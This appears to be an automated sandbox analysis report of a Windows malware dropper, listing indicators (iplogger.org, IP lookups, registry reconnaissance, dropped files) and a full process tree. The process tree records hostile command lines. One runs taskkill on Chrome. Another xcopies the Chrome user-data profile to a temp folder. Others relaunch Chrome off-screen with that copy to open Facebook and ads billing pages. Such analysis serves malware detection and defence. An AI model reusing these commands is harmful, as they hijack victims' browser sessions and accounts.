| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f010.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\4a97b300fe2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\905632896c45f77778bf0d6955d68c42_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\73c5ea81f5117.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\4a97b300fe2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\a7ffedbefb5b58d4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\4a97b300fe2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\4a97b300fe2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\4a97b300fe2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\905632896c45f77778bf0d6955d68c42_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\905632896c45f77778bf0d6955d68c42_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d1013002f91823f1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4a97b300fe2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a7ffedbefb5b58d4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6190f7acba29203.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c4820dd43af06255.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 73c5ea81f5117.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 562e5c38e3756.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 00e36d77b6e888.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9015ceeff479.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d1013002f91823f010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\00e36d77b6e888.exe
00e36d77b6e888.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\562e5c38e3756.exe
562e5c38e3756.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\9015ceeff479.exe
9015ceeff479.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f1.exe
d1013002f91823f1.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\c4820dd43af06255.exe
c4820dd43af06255.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f010.exe
d1013002f91823f010.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\6190f7acba29203.exe
6190f7acba29203.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\a7ffedbefb5b58d4.exe
a7ffedbefb5b58d4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\4a97b300fe2.exe
4a97b300fe2.exe
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\73c5ea81f5117.exe
73c5ea81f5117.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3928 -ip 3928
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 568
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f1.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCA2AC287\d1013002f91823f1.exe" -a
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4544 -ip 4544
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732391697 0
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 356
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd641fcc40,0x7ffd641fcc4c,0x7ffd641fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=1900,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --field-trial-handle=2268,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2284 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3560,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3556,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3708 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4744,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3964 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4756,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4944 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5100,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3996,i,1584178047657553961,2370459223576820665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
